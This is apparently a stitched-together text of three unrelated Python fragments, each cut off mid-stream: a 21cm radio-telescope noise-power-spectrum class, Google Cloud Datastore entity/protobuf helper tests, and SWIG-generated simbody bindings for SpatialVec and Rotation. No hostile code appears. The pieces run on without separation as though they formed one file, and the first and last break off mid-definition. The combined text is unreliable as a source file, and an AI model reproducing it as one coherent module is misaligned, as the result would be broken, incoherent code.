effective Tampl by 1/omtcoupling (default: 0.9) skycoupling : float, optional Coupling of the primary beam to the sky, such that a fraction (1-skycoupling) of the beam hits the ground instead of the sky (default: 0.9) hexpack : bool, optional True if dishes are hex-packed, False if they are square-packed (default: True) """ def __init__ (self,C,Nside=256, D=6, tint=5, fsky=0.5, effic=0.7, Tampl=50., Tground=300., omtcoupling=0.9, skycoupling=0.9, hexpack=True): # CCL cosmology class self.C=C # Number of dishes per array side self.Nside=Nside # Total number of dishes self.Nd=Nside**2 # Roughly, maximum baseline length in square array self.Dmax=Nside*np.sqrt(2)*D # m # Physical dish diameter self.D=D # m # Effective dish diameter self.Deff=self.D*np.sqrt(effic) # m # Total integration time self.ttotal=tint*365*24*3600 # s # Sky area self.Sarea=4*np.pi*fsky # sr # Sky fraction self.fsky=fsky # Effective dish area self.Ae=np.pi/4*D**2*effic # m^2 # Contribution to system temperature from amplifier and groundspill # (Eq. D1 in paper) self.Tscope=Tampl/omtcoupling/skycoupling+Tground*(1-skycoupling)/skycoupling # K # Hex packing setting self.hexpack=hexpack def nofl(self,x): """Number density of baselines on the ground. Parameters ---------- x : float or array Baseline length(s), in m. Returns ------- res : float or array Number density of baselines of given length(s), in m^-2. """ ### quadratic packing if (not self.hexpack): ### square packing a,b,B,C,D=0.4847, -0.330, 1.3157, 1.5975, 6.8390 else: ### hexagonal packing a,b,B,C,D=0.56981864, -0.52741196, 0.8358006 , 1.66354748, 7.31776875 # Scale physical distances by Nside*D xn=np.asarray(x)/(self.Nside*self.D) # Fitting function prefactor n0=(self.Nside/self.D)**2 # m^-2 # Fitting formula evaluation res=np.asarray( n0*(a+b*xn)/(1+B*xn**C)*np.exp(-(xn)**D) ) # m^-2 # Impose numerical floor on result if (res.shape == ()): res = np.max([res,1e-10]) else: res[res<1e-10]=1e-10 return res def PNoise(self,z,kperp): """Thermal noise power spectrum. Parameters ---------- z : float Redshift. kperp : float or array kperp value(s), in Mpc^-1. Returns ------- Pn : float or array Thermal noise power spectrum, in K^2 Mpc^3. """ # Observed wavelength lam=0.21*(1+z) # m # Comoving radial distance to redshift z r=ccl.comoving_radial_distance(self.C,1/(1.+z)) # Mpc # Conversion between kperp and uv-plane (vector norm) u u=np.asarray(kperp)*r/(2*np.pi) # Baseline length corresponding to u l=u*lam # m # Number density of baselines in uv plane Nu = self.nofl(l)*lam**2 # Inaccurate approximation for uv-plane baseline density #umax=self.Dmax/lam #Nu=self.Nd**2/(2*np.pi*umax**2) # Field of view of single dish FOV=(lam/self.Deff)**2 # sr # Hubble parameter H(z) Hz=self.C['H0']*ccl.h_over_h0(self.C,1./(1.+z)) # km s^-1 Mpc^-1 # Conversion factor from frequency to physical space y=3e5*(1+z)**2/(1420e6*Hz) # Mpc s # System temperature (sum of telescope and sky temperatures) Tsys=self.Tsky(1420./(1+z))+self.Tscope # K # 21cm noise power spectrum (Eq. D4 of paper). # Hard-codes 2 polarizations Pn=Tsys**2*r**2*y*(lam**4/self.Ae**2)* 1/(2*Nu*self.ttotal) * (self.Sarea/FOV) # K^2 Mpc^3 # Catastrophically fail if we've gotten negative power spectrum values if np.any(Pn<0): print (Nu,Pn,l, self.nofl(l), self.nofl(l/2)) stop() return Pn def PNoiseShot(self,z,Tb): """21cm shot noise power spectrum. Parameters ---------- z : float Redshift. Tb : float Mean 21cm brightness temperature (your choice of units). Returns ------- pn : float or array Shot noise power spectrum, in Mpc^3 times square of input Tb units. """ return Tb**2*castorinaPn(z)/(self.C['h'])**3 def PNoiseKFull(self,z,kperp,kpar, Tb=None,kparcut=0.01*0.7): """Full 21cm noise power spectrum, with specified kpar cut Parameters ---------- z : float Redshift. kperp : array[nkpar,nkperp] 2d array where columns are kperp values (in Mpc^-1) and rows are identical. Generate e.g. with np.outer(np.ones(nkpar),kperp_vec) where kperp_vec is a list of kperp values. kpar : array[nkpar,nkperp] 2d array where rows are kpar values (in Mpc^-1) and columns are identical. Tb : float, optional Mean 21cm brightness temperature, in K (default: computed automatically). kparcut : float, optional Set Pnoise to large value if kpar<kparcut, in Mpc^-1 (default: 0.007). Returns ------- Pn : array[nkpar,nkperp] Array of sums of 21cm thermal noise and shot noise power spectra, in K^2 Mpc^3. """ assert(len(kperp.shape)==2) assert(len(kpar.shape)==2) if Tb is None: Tb=self.Tb(z) Pn=self.PNoise(z,kperp)+self.PNoiseShot(z,Tb) Pn[kpar<kparcut]=1e30 return Pn def PHINoiseKFull(self,z,kperp,kpar, Tb=None,kparcut=0.01*0.7): """Full HI noise power spectrum. This has units of Mpc^3, and is therefore the noise power spectrum of P_HI(k), incorporating both HI shot noise and telescope thermal noise. Input parameters are same as PNoiseKFull. Returns ------- Pn : array[nkpar,nkperp] Array of effective HI noise power spectrum, in Mpc^3. """ if Tb is None: Tb = self.Tb(z) return self.PNoiseKFull(z,kperp,kpar,Tb=Tb,kparcut=kparcut) / Tb**2 def bias(self,z): """HI bias with redshift. Parameters ---------- z : float or array Redshift(s). Returns ------- b : float or array b_HI(z) values. """ return castorinaBias(z) def Tsky(self,f): """Mean sky temperature, including Galactic synchrotron and CMB. Parameters ---------- f : float or array Frequency or array of frequencies, in MHz. Returns ------- Tsky : float or array Sky temperature(s), in K. """ #return (f/100.)**(-2.4)*2000+2.7 ## from CVFisher return 25.*(np.asarray(f)/400.)**(-2.75) +2.75 def TbTZ(self,z): """Approximation for mean 21cm brightness temperature. This is from Chang et al. 2008, https://arxiv.org/pdf/0709.3672.pdf, Eq. 1. Parameters ---------- z : float or array Redshift(s). Returns ------- Tb : float or array Temperature values, in K. """ OmegaM=0.31 z = np.asarray(z) return 0.3e-3*np.sqrt((1+z)/(2.5)*0.29/(OmegaM+(1.-OmegaM)/(1+z)**3)) def Tb(self,z): """Approximation for mean 21cm brightness temperature. This is reasonably up-to-date, and comes from Eq. B1 in the CV 21cm paper. Parameters ---------- z : float or array Redshift(s). Returns ------- Tb : float or array Temperature value(s), in K. """ z = np.asarray(z) Ez=ccl.h_over_h0(self.C,1./(1.+z)) # Note potentially misleading notation: # Ohi = (comoving density at z) / (critical density at z=0) Ohi=4e-4*(1+z)**0.6 Tb=188e-3*self.C['h']/Ez*Ohi*(1+z)**2 return Tb def cutWedge(self, noise, kperp, kpar, z, NW=3.0): """Cut the foreground wedge from a 2d noise power spectrum. Parameters ---------- noise : array[nkpar,nkperp] 2d noise power spectrum. kperp : array[nkpar,nkperp] 2d array where columns are kperp values (in Mpc^-1) and rows are identical. kpar : array[nkpar,nkperp] 2d array where rows are kpar values (in Mpc^-1) and columns are identical. z : float Redshift. NW : float, optional Multiplier defining wedge in terms of primary beam. (default = 3) Returns ------- Pn : array[nkpar,nkperp] 2d noise power spectrum where modes within wedge have noise set to large value. """ # Comoving radial distance to redshift z r=ccl.comoving_radial_distance(self.C,1/(1.+z)) # Mpc # Hubble parameter H(z) H=self.C['H0']*ccl.h_over_h0(self.C,1./(1.+z)) # km s^-1 Mpc^-1 # Slope that defines wedge as kpar < kperp * slope. # See Eq. C1 from the CV 21cm paper. slope= r*H/3e5 * 1.22 *0.21/self.D * NW / 2.0 # dimensionless # Boost noise for modes within wedge noiseout=np.copy(noise) noiseout[np.where(kpar<kperp*slope)]=1e30 return noiseout def PSSensitivityTransit (self, freq=600, bandwidth=900): """One sigma point source transit sensitivity Also prints some quantities for comparison: Tsys, t_eff for the input telescope and CHIME, and the point source sensitivity for CHIME. Parameters ---------- freq : float, optional Frequency, in MHz (default = 600). bandwidth : float, optional Bandwidth, in MHz (default = 900). Returns ------- onesigma : float Point source sensitivity, in Jy. """ # Boltzmann constant kB=1.38064852e-23 # J K^-1 # Observed wavelength lam = 3e8/(freq*1e6) # m # Total instrument collecting area Acoll= self.Ae*self.Nd
<gh_stars>10-100 # Copyright 2014 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest def test__new_value_pb(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb entity_pb = entity_pb2.Entity() name = "foo" result = _new_value_pb(entity_pb, name) assert isinstance(result, type(entity_pb2.Value()._pb)) assert len(entity_pb._pb.properties) == 1 assert entity_pb._pb.properties[name] == result def test_entity_from_protobuf_w_defaults(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = _PROJECT entity_pb._pb.key.path.add(kind=_KIND, id=_ID) value_pb = _new_value_pb(entity_pb, "foo") value_pb.string_value = "Foo" unindexed_val_pb = _new_value_pb(entity_pb, "bar") unindexed_val_pb.integer_value = 10 unindexed_val_pb.exclude_from_indexes = True array_val_pb1 = _new_value_pb(entity_pb, "baz") array_pb1 = array_val_pb1.array_value.values unindexed_array_val_pb = array_pb1.add() unindexed_array_val_pb.integer_value = 11 unindexed_array_val_pb.exclude_from_indexes = True array_val_pb2 = _new_value_pb(entity_pb, "qux") array_pb2 = array_val_pb2.array_value.values indexed_array_val_pb = array_pb2.add() indexed_array_val_pb.integer_value = 12 entity = entity_from_protobuf(entity_pb._pb) assert entity.kind == _KIND assert entity.exclude_from_indexes == frozenset(["bar", "baz"]) entity_props = dict(entity) assert entity_props == {"foo": "Foo", "bar": 10, "baz": [11], "qux": [12]} # Also check the key. key = entity.key assert key.project == _PROJECT assert key.namespace is None assert key.kind == _KIND assert key.id == _ID def test_entity_from_protobuf_w_mismatched_value_indexed(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = _PROJECT entity_pb._pb.key.path.add(kind=_KIND, id=_ID) array_val_pb = _new_value_pb(entity_pb, "baz") array_pb = array_val_pb.array_value.values unindexed_value_pb1 = array_pb.add() unindexed_value_pb1.integer_value = 10 unindexed_value_pb1.exclude_from_indexes = True unindexed_value_pb2 = array_pb.add() unindexed_value_pb2.integer_value = 11 with pytest.raises(ValueError): entity_from_protobuf(entity_pb._pb) def test_entity_from_protobuf_w_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() entity = entity_from_protobuf(entity_pb._pb) assert entity.key is None assert dict(entity) == {} def test_entity_from_protobuf_w_pb2_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() entity = entity_from_protobuf(entity_pb) assert entity.key is None assert dict(entity) == {} def test_entity_from_protobuf_w_entity_with_meaning(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() name = "hello" value_pb = _new_value_pb(entity_pb, name) value_pb.meaning = meaning = 9 value_pb.string_value = val = u"something" entity = entity_from_protobuf(entity_pb) assert entity.key is None assert dict(entity) == {name: val} assert entity._meanings == {name: (meaning, val)} def test_entity_from_protobuf_w_nested_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf PROJECT = "FOO" KIND = "KIND" INSIDE_NAME = "IFOO" OUTSIDE_NAME = "OBAR" INSIDE_VALUE = 1337 entity_inside = entity_pb2.Entity() inside_val_pb = _new_value_pb(entity_inside, INSIDE_NAME) inside_val_pb.integer_value = INSIDE_VALUE entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = PROJECT element = entity_pb._pb.key.path.add() element.kind = KIND outside_val_pb = _new_value_pb(entity_pb, OUTSIDE_NAME) outside_val_pb.entity_value.CopyFrom(entity_inside._pb) entity = entity_from_protobuf(entity_pb._pb) assert entity.key.project == PROJECT assert entity.key.flat_path == (KIND,) assert len(entity) == 1 inside_entity = entity[OUTSIDE_NAME] assert inside_entity.key is None assert len(inside_entity) == 1 assert inside_entity[INSIDE_NAME] == INSIDE_VALUE def test_entity_from_protobuf_w_index_mismatch_w_empty_list(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 array_val_pb = entity_pb2.Value(array_value=entity_pb2.ArrayValue(values=[])) entity_pb = entity_pb2.Entity(properties={"baz": array_val_pb}) entity_pb.key.partition_id.project_id = _PROJECT entity_pb.key._pb.path.add(kind=_KIND, id=_ID) entity = entity_from_protobuf(entity_pb._pb) entity_dict = dict(entity) assert entity_dict["baz"] == [] def _compare_entity_proto(entity_pb1, entity_pb2): assert entity_pb1.key == entity_pb2.key value_list1 = sorted(entity_pb1.properties.items()) value_list2 = sorted(entity_pb2.properties.items()) assert len(value_list1) == len(value_list2) for pair1, pair2 in zip(value_list1, value_list2): name1, val1 = pair1 name2, val2 = pair2 assert name1 == name2 if val1._pb.HasField("entity_value"): # Message field (Entity) assert val1.meaning == val2.meaning _compare_entity_proto(val1.entity_value, val2.entity_value) else: assert val1 == val2 def test_enity_to_protobf_w_empty(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity_pb = entity_to_protobuf(entity) _compare_entity_proto(entity_pb, entity_pb2.Entity()) def test_enity_to_protobf_w_key_only(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf from google.cloud.datastore.key import Key kind, name = "PATH", "NAME" project = "PROJECT" key = Key(kind, name, project=project) entity = Entity(key=key) entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() expected_pb.key.partition_id.project_id = project path_elt = expected_pb._pb.key.path.add() path_elt.kind = kind path_elt.name = name _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_simple_fields(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name1 = "foo" entity[name1] = value1 = 42 name2 = "bar" entity[name2] = value2 = u"some-string" entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() val_pb1 = _new_value_pb(expected_pb, name1) val_pb1.integer_value = value1 val_pb2 = _new_value_pb(expected_pb, name2) val_pb2.string_value = value2 _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_with_empty_list(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["foo"] = [] entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() prop = expected_pb._pb.properties.get_or_create("foo") prop.array_value.CopyFrom(entity_pb2.ArrayValue(values=[])._pb) _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_inverts_to_protobuf(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf from google.cloud.datastore.helpers import entity_to_protobuf original_pb = entity_pb2.Entity() # Add a key. original_pb.key.partition_id.project_id = project = "PROJECT" elem1 = original_pb._pb.key.path.add() elem1.kind = "Family" elem1.id = 1234 elem2 = original_pb._pb.key.path.add() elem2.kind = "King" elem2.name = "Spades" # Add an integer property. val_pb1 = _new_value_pb(original_pb, "foo") val_pb1.integer_value = 1337 val_pb1.exclude_from_indexes = True # Add a string property. val_pb2 = _new_value_pb(original_pb, "bar") val_pb2.string_value = u"hello" # Add a nested (entity) property. val_pb3 = _new_value_pb(original_pb, "entity-baz") sub_pb = entity_pb2.Entity() sub_val_pb1 = _new_value_pb(sub_pb, "x") sub_val_pb1.double_value = 3.14 sub_val_pb2 = _new_value_pb(sub_pb, "y") sub_val_pb2.double_value = 2.718281828 val_pb3.meaning = 9 val_pb3.entity_value.CopyFrom(sub_pb._pb) # Add a list property. val_pb4 = _new_value_pb(original_pb, "list-quux") array_val1 = val_pb4.array_value.values.add() array_val1.exclude_from_indexes = False array_val1.meaning = meaning = 22 array_val1.blob_value = b"\xe2\x98\x83" array_val2 = val_pb4.array_value.values.add() array_val2.exclude_from_indexes = False array_val2.meaning = meaning array_val2.blob_value = b"\xe2\x98\x85" # Convert to the user-space Entity. entity = entity_from_protobuf(original_pb) # Convert the user-space Entity back to a protobuf. new_pb = entity_to_protobuf(entity) # NOTE: entity_to_protobuf() strips the project so we "cheat". new_pb.key.partition_id.project_id = project _compare_entity_proto(original_pb, new_pb) def test_enity_to_protobf_w_meaning_with_change(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name = "foo" entity[name] = value = 42 entity._meanings[name] = (9, 1337) entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() value_pb = _new_value_pb(expected_pb, name) value_pb.integer_value = value # NOTE: No meaning is used since the value differs from the # value stored. _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_variable_meanings(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name = "quux" entity[name] = values = [1, 20, 300] meaning = 9 entity._meanings[name] = ([None, meaning, None], values) entity_pb = entity_to_protobuf(entity) # Construct the expected protobuf. expected_pb = entity_pb2.Entity() value_pb = _new_value_pb(expected_pb, name) value0 = value_pb.array_value.values.add() value0.integer_value = values[0] # The only array entry with a meaning is the middle one. value1 = value_pb.array_value.values.add() value1.integer_value = values[1] value1.meaning = meaning value2 = value_pb.array_value.values.add() value2.integer_value = values[2] _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_dict_to_entity(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["a"] = {"b": u"c"} entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity( properties={ "a": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={"b": entity_pb2.Value(string_value="c")} ) ) } ) assert entity_pb == expected_pb def test_enity_to_protobf_w_dict_to_entity_recursive(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["a"] = {"b": {"c": {"d": 1.25}, "e": True}, "f": 10} entity_pb = entity_to_protobuf(entity) b_entity_pb = entity_pb2.Entity( properties={ "c": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={"d": entity_pb2.Value(double_value=1.25)} ) ), "e": entity_pb2.Value(boolean_value=True), } ) expected_pb = entity_pb2.Entity( properties={ "a": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={ "b": entity_pb2.Value(entity_value=b_entity_pb), "f": entity_pb2.Value(integer_value=10), } ) ) } ) assert entity_pb == expected_pb def _make_key_pb(project=None, namespace=None, path=()): from google.cloud.datastore_v1.types import entity as entity_pb2 pb = entity_pb2.Key() if project is not None: pb.partition_id.project_id = project if namespace is not None: pb.partition_id.namespace_id = namespace for elem in path: added = pb._pb.path.add() added.kind = elem["kind"] if "id" in elem: added.id = elem["id"] if "name" in elem: added.name = elem["name"] return pb def test_key_from_protobuf_wo_namespace_in_pb(): from google.cloud.datastore.helpers import key_from_protobuf _PROJECT = "PROJECT" pb = _make_key_pb(path=[{"kind": "KIND"}], project=_PROJECT) key = key_from_protobuf(pb) assert key.project == _PROJECT assert key.namespace is None def test_key_from_protobuf_w_namespace_in_pb(): from google.cloud.datastore.helpers import key_from_protobuf _PROJECT
const & e3: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e4: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e5: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e6: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e7: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e8: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & """ this = _simbody.new_SpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def setToNaN(self): """ setToNaN(SpatialVec self) Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > * """ return _simbody.SpatialVec_setToNaN(self) def setToZero(self): """ setToZero(SpatialVec self) Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > * """ return _simbody.SpatialVec_setToZero(self) def isNaN(self): """ isNaN(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isNaN(self) def isInf(self): """ isInf(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isInf(self) def isFinite(self): """ isFinite(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isFinite(self) def getDefaultTolerance(): """getDefaultTolerance() -> double""" return _simbody.SpatialVec_getDefaultTolerance() getDefaultTolerance = staticmethod(getDefaultTolerance) def isNumericallyEqual(self, *args): """ isNumericallyEqual(SpatialVec self, Vec3 e, double tol) -> bool Parameters ---------- e: SimTK::Vec< 3,double,1 > const & tol: double isNumericallyEqual(SpatialVec self, Vec3 e) -> bool Parameters ---------- e: SimTK::Vec< 3,double,1 > const & """ return _simbody.SpatialVec_isNumericallyEqual(self, *args) def toString(self): """ toString(SpatialVec self) -> std::string Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_toString(self) def set(self, i, value): """ set(SpatialVec self, int i, Vec3 value) Parameters ---------- i: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & """ return _simbody.SpatialVec_set(self, i, value) def get(self, i): """ get(SpatialVec self, int i) -> Vec3 Parameters ---------- i: int """ return _simbody.SpatialVec_get(self, i) def __str__(self): """ __str__(SpatialVec self) -> std::string Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec___str__(self) def __len__(self): """ __len__(SpatialVec self) -> int Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec___len__(self) __swig_destroy__ = _simbody.delete_SpatialVec __del__ = lambda self: None SpatialVec_swigregister = _simbody.SpatialVec_swigregister SpatialVec_swigregister(SpatialVec) def SpatialVec_size(): """SpatialVec_size() -> int""" return _simbody.SpatialVec_size() def SpatialVec_nrow(): """SpatialVec_nrow() -> int""" return _simbody.SpatialVec_nrow() def SpatialVec_ncol(): """SpatialVec_ncol() -> int""" return _simbody.SpatialVec_ncol() def SpatialVec_getDefaultTolerance(): """SpatialVec_getDefaultTolerance() -> double""" return _simbody.SpatialVec_getDefaultTolerance() class VectorOfSpatialVec(_object): """Proxy of C++ SimTK::Vector_<(SimTK::SpatialVec)> class.""" __swig_setmethods__ = {} __setattr__ = lambda self, name, value: _swig_setattr(self, VectorOfSpatialVec, name, value) __swig_getmethods__ = {} __getattr__ = lambda self, name: _swig_getattr(self, VectorOfSpatialVec, name) __repr__ = _swig_repr def __init__(self, *args): """ __init__(SimTK::Vector_<(SimTK::SpatialVec)> self) -> VectorOfSpatialVec __init__(SimTK::Vector_<(SimTK::SpatialVec)> self, VectorOfSpatialVec src) -> VectorOfSpatialVec Parameters ---------- src: SimTK::Vector_< SimTK::SpatialVec > const & __init__(SimTK::Vector_<(SimTK::SpatialVec)> self, int m, SpatialVec initialValue) -> VectorOfSpatialVec Parameters ---------- m: int initialValue: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ this = _simbody.new_VectorOfSpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def toString(self): """ toString(VectorOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return _simbody.VectorOfSpatialVec_toString(self) def get(self, i): """ get(VectorOfSpatialVec self, int i) -> SpatialVec Parameters ---------- i: int """ return _simbody.VectorOfSpatialVec_get(self, i) def set(self, i, value): """ set(VectorOfSpatialVec self, int i, SpatialVec value) Parameters ---------- i: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ return _simbody.VectorOfSpatialVec_set(self, i, value) def __str__(self): """ __str__(VectorOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return _simbody.VectorOfSpatialVec___str__(self) def __len__(self): """ __len__(VectorOfSpatialVec self) -> int Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return _simbody.VectorOfSpatialVec___len__(self) __swig_destroy__ = _simbody.delete_VectorOfSpatialVec __del__ = lambda self: None VectorOfSpatialVec_swigregister = _simbody.VectorOfSpatialVec_swigregister VectorOfSpatialVec_swigregister(VectorOfSpatialVec) class MatrixOfSpatialVec(_object): """Proxy of C++ SimTK::Matrix_<(SimTK::SpatialVec)> class.""" __swig_setmethods__ = {} __setattr__ = lambda self, name, value: _swig_setattr(self, MatrixOfSpatialVec, name, value) __swig_getmethods__ = {} __getattr__ = lambda self, name: _swig_getattr(self, MatrixOfSpatialVec, name) __repr__ = _swig_repr def __init__(self, *args): """ __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self) -> MatrixOfSpatialVec __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, MatrixOfSpatialVec src) -> MatrixOfSpatialVec Parameters ---------- src: SimTK::Matrix_< SimTK::SpatialVec > const & __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, int m, int n) -> MatrixOfSpatialVec Parameters ---------- m: int n: int __init__(SimTK::Matrix_<(SimTK::SpatialVec)> self, int m, int n, SpatialVec initialValue) -> MatrixOfSpatialVec Parameters ---------- m: int n: int initialValue: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ this = _simbody.new_MatrixOfSpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def toString(self): """ toString(MatrixOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Matrix_< SimTK::SpatialVec > const * """ return _simbody.MatrixOfSpatialVec_toString(self) def get(self, i, j): """ get(MatrixOfSpatialVec self, int i, int j) -> SpatialVec Parameters ---------- i: int j: int """ return _simbody.MatrixOfSpatialVec_get(self, i, j) def set(self, i, j, value): """ set(MatrixOfSpatialVec self, int i, int j, SpatialVec value) Parameters ---------- i: int j: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ return _simbody.MatrixOfSpatialVec_set(self, i, j, value) __swig_destroy__ = _simbody.delete_MatrixOfSpatialVec __del__ = lambda self: None MatrixOfSpatialVec_swigregister = _simbody.MatrixOfSpatialVec_swigregister MatrixOfSpatialVec_swigregister(MatrixOfSpatialVec) BodyRotationSequence = _simbody.BodyRotationSequence SpaceRotationSequence = _simbody.SpaceRotationSequence class Rotation(Mat33): """Proxy of C++ SimTK::Rotation_<(double)> class.""" __swig_setmethods__ = {} for _s in [Mat33]: __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {})) __setattr__ = lambda self, name, value: _swig_setattr(self, Rotation, name, value) __swig_getmethods__ = {} for _s in [Mat33]: __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {})) __getattr__ = lambda self, name: _swig_getattr(self, Rotation, name) __repr__ = _swig_repr def setRotationToIdentityMatrix(self): """ setRotationToIdentityMatrix(Rotation self) -> Rotation Parameters ---------- self: SimTK::Rotation_< double > * """ return _simbody.Rotation_setRotationToIdentityMatrix(self) def setRotationToNaN(self): """ setRotationToNaN(Rotation self) -> Rotation Parameters ---------- self: SimTK::Rotation_< double > * """ return _simbody.Rotation_setRotationToNaN(self) def setRotationFromAngleAboutAxis(self, angle, axis): """ setRotationFromAngleAboutAxis(Rotation self, double angle, CoordinateAxis axis) -> Rotation Parameters ---------- angle: double axis: SimTK::CoordinateAxis const & """ return _simbody.Rotation_setRotationFromAngleAboutAxis(self, angle, axis) def setRotationFromAngleAboutX(self, *args): """ setRotationFromAngleAboutX(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutX(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutX(self, *args) def setRotationFromAngleAboutY(self, *args): """ setRotationFromAngleAboutY(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutY(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutY(self, *args) def setRotationFromAngleAboutZ(self, *args): """ setRotationFromAngleAboutZ(Rotation self, double angle) -> Rotation Parameters ---------- angle: double setRotationFromAngleAboutZ(Rotation self, double cosAngle, double sinAngle) -> Rotation Parameters ---------- cosAngle: double sinAngle: double """ return _simbody.Rotation_setRotationFromAngleAboutZ(self, *args) def setRotationFromAngleAboutNonUnitVector(self, angle, nonUnitVector): """ setRotationFromAngleAboutNonUnitVector(Rotation self, double angle, Vec3 nonUnitVector) -> 